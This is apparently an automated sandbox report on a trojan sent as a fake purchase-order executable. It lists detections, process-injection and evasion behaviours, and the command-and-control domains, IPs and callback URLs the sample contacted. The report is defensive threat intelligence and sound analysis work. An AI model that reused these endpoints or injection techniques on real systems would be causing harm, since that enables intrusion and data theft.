          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321097 Sample: Purchase Order 40,7045$.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 34 www.handsfreedocs.com 2->34 36 www.lotoencasa.com 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 7 other signatures 2->46 11 Purchase Order 40,7045$.exe 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 14 Purchase Order 40,7045$.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.realitytvstockwatch.com 103.224.182.242, 49761, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 searchnehomes.com 34.102.136.180, 49763, 80 GOOGLEUS United States 17->30 32 22 other IPs or domains 17->32 38 System process connects to network (likely due to code injection or exploit) 17->38 21 ipconfig.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order 40,7045$.exe43%VirustotalBrowse
          Purchase Order 40,7045$.exe36%ReversingLabs
          Purchase Order 40,7045$.exe100%AviraTR/AD.Swotter.vxbef
          Purchase Order 40,7045$.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.Purchase Order 40,7045$.exe.2f40000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Purchase Order 40,7045$.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          sweetbasilmarketing.com2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.hemparcade.com/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://yuyabo.com/0%Avira URL Cloudsafe
          http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.hemparcade.com0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.realitytvstockwatch.com
          		103.224.182.242
          		truetrue
            		unknown
            www.the-gongs.com
            		104.253.79.71
            		truetrue
              		unknown
              td-balancer-euw2-6-109.wixdns.net
              		35.246.6.109
              		truetrue
                		unknown
                sweetbasilmarketing.com
                		185.201.11.126
                		truetrueunknown
                prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                		3.12.202.18
                		truefalse
                  		high
                  www.maninhatphoto.com
                  		154.86.218.70
                  		truetrue
                    		unknown
                    fahufu.com
                    		194.35.122.226
                    		truetrue
                      		unknown
                      www.justsoldbykristen.com
                      		52.71.133.130
                      		truetrue
                        		unknown
                        heartandcrowncloset.com
                        		160.153.136.3
                        		truetrue
                          		unknown
                          searchnehomes.com
                          		34.102.136.180
                          		truetrue
                            		unknown
                            www.lotoencasa.com
                            		192.155.168.14
                            		truefalse
                              		unknown
                              www.ariasu-nakanokaikei.com
                              		13.226.173.80
                              		truetrue
                                		unknown
                                www.hemparcade.com
                                		52.58.78.16
                                		truetrue
                                  		unknown
                                  www.searchnehomes.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.heartandcrowncloset.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.fahufu.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.placeduconfort.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.handsfreedocs.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.shopnicknaks.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.happinestbuilders.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.sweetbasilmarketing.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.hemparcade.com/ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://yuyabo.com/ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hemparcade.comipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://fontfabrik.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.fonts.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.sandoll.co.krexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.sakkal.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        52.58.78.16
                                                                        		unknownUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        194.35.122.226
                                                                        		unknownGermany
                                                                        		35913DEDIPATH-LLCUStrue
                                                                        185.201.11.126
                                                                        		unknownGermany
                                                                        		47583AS-HOSTINGERLTtrue
                                                                        3.134.22.63
                                                                        		unknownUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        160.153.136.3
                                                                        		unknownUnited States
                                                                        		21501GODADDY-AMSDEtrue
                                                                        103.224.182.242
                                                                        		unknownAustralia
                                                                        		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                        104.253.79.71
                                                                        		unknownUnited States
                                                                        		18779EGIHOSTINGUStrue
                                                                        52.71.133.130
                                                                        		unknownUnited States
                                                                        		14618AMAZON-AESUStrue
                                                                        3.12.202.18
                                                                        		unknownUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        35.246.6.109
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUStrue
                                                                        154.86.218.70
                                                                        		unknownSeychelles
                                                                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                        34.102.136.180
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUStrue
                                                                        13.226.173.80
                                                                        		unknownUnited States
                                                                        		16509AMAZON-02UStrue

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                        Analysis ID:321097
                                                                        Start date:20.11.2020
                                                                        Start time:11:05:32
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 9m 37s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:Purchase Order 40,7045$.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:26
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@7/0@17/13
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 53.2% (good quality ratio 48.5%)
                                                                        • Quality average: 72.7%
                                                                        • Quality standard deviation: 31.2%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 23.210.248.85, 104.42.151.234, 51.104.139.180, 2.23.155.168, 2.23.155.123, 2.23.155.138, 92.123.180.139, 92.123.180.131, 2.23.155.122, 2.23.155.114, 51.103.5.186, 52.155.217.156, 20.54.26.129, 95.101.22.125, 95.101.22.134
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        No simulations

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        52.58.78.16Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                        • www.hopeharboracademy.com/nwrr/?Rxo=L6hH4NIhfjzT&cj=Pi3dZNULKacZO0lwTZm3VIIJvRqy9WRTjR1P4HicrXgGmUrIoUMqJ7S/A3ArvLwtmevO+VO23g==
                                                                        Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                        • www.hemparcade.com/igqu/?YnztXrjp=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TKSXSboJU2x&sBZxwb=FxlXFP2PHdiD2
                                                                        SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                                                        • www.viltais.com/nt8e/?7nwltvxh=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJMa7ZMKbETQi&org=3foxnfCXOnIhKD
                                                                        Order Specification Requirement With Ref. AMABINIF38535.exeGet hashmaliciousBrowse
                                                                        • www.stranded.xyz/utau/?p64=8prxehCX&2dZ8=dR3TRUG1QGrDYRBc9/3PRmogi1D8+kv0RMejNxu9Gn4uSO50WrJFoJLJiRJ5mGAJbjLS
                                                                        new file.exe.exeGet hashmaliciousBrowse
                                                                        • www.sunflowersbikini.com/o1u9/?uFNH=XRlPhLopGJm&njkdnt=NfcJdyO4TBqmRNhg7R1KNJwTQ4N5hlclnZQkvT+zgqJmuxY/wV7RTlrJQJKYZhgz2gKA
                                                                        XCnhrl4qRO.exeGet hashmaliciousBrowse
                                                                        • www.phybby.com/xnc/?iB=CnlpdrqHk6fHx&uN9da=KMkfkwH+qCev6y9SIhjzkdXaKQKuNlF/lv9fMwnf5/4ZPrTh2Mio2MF0cfaBEzR8Th1t
                                                                        COMMERCIAL INVOICE BILL OF LADING DOC.exeGet hashmaliciousBrowse
                                                                        • www.basketdelivered.com/o9b2/?u6u4=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRIRvKc0H9QVN&J484=xPJtLXbX
                                                                        tbzcpAZnBK.exeGet hashmaliciousBrowse
                                                                        • www.jencian.com/t4vo/?t8S8=GNX37zD4+hCCMzbajgO2uA69rnGPPC6iQo0EFF7Ue/8gqGUBoM5ya+5BJI3qcC1vYrK1&Njfhlh=8p4PgtUX
                                                                        zYUJ3b5gQF.exeGet hashmaliciousBrowse
                                                                        • www.hemparcade.com/igqu/?1b8hnra=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&OZNPdr=iJEt_DFhGZplHfm0
                                                                        COMMERCIAL INVOICE BILL OF LADING DOC.exeGet hashmaliciousBrowse
                                                                        • www.basketdelivered.com/o9b2/?DVB0=pTlpd6wHb&QR0=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRLxVaNU/n30K
                                                                        RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exeGet hashmaliciousBrowse
                                                                        • www.central.properties/vrf/?jVgH=aHUqqRuO6ZK9z0Ddr0bilnwC+HUi2BKQSuMw/XTnNfUykuBqiT/kuVIPFhCASh0TBUtx&-Zi=W6RxUV3PO
                                                                        Factura.exeGet hashmaliciousBrowse
                                                                        • www.devcomunicacao.com/ve9i/?_f-tK4=pQO4LhLAXoDAWMXX61mXtQYyMLN+wLZ8Px2vxkY+llKJMI7QZndoWfY9jQFnQqWsTUfq&hvK8=Q4j0
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.hemparcade.com/igqu/?GPWlMXk=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TK4IiroNW+x&Ano=O2JpLTIpT0jt
                                                                        bSpRY88fjIgazcB.exeGet hashmaliciousBrowse
                                                                        • www.cazoud.com/k8b/
                                                                        Lyh84tCfgI.exeGet hashmaliciousBrowse
                                                                        • www.drillingclient.com/vdi/?FR9Tk=GbsOdEqF4JVfil823eZqM4/+KjPH9duQu8mBX7+Y8fERG1y/Z6ARoUoWNMmrIwW0wvQO&Bj=lHRH9PdPH6D
                                                                        HMT-200810-02.exeGet hashmaliciousBrowse
                                                                        • www.devcomunicacao.com/ve9i/?GFNDK=pQO4LhLAXoDAWMXX61mXtQYyMLN+wLZ8Px2vxkY+llKJMI7QZndoWfY9jQFNPamsXWXq&CTvX=ctxhPjJH
                                                                        ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • www.hopeharboracademy.com/nwrr/?3f=GPJl7HDX&lnSh=Pi3dZNULKacZO0lwTZm3VIIJvRqy9WRTjR1P4HicrXgGmUrIoUMqJ7S/A0s7z6sWhrGf
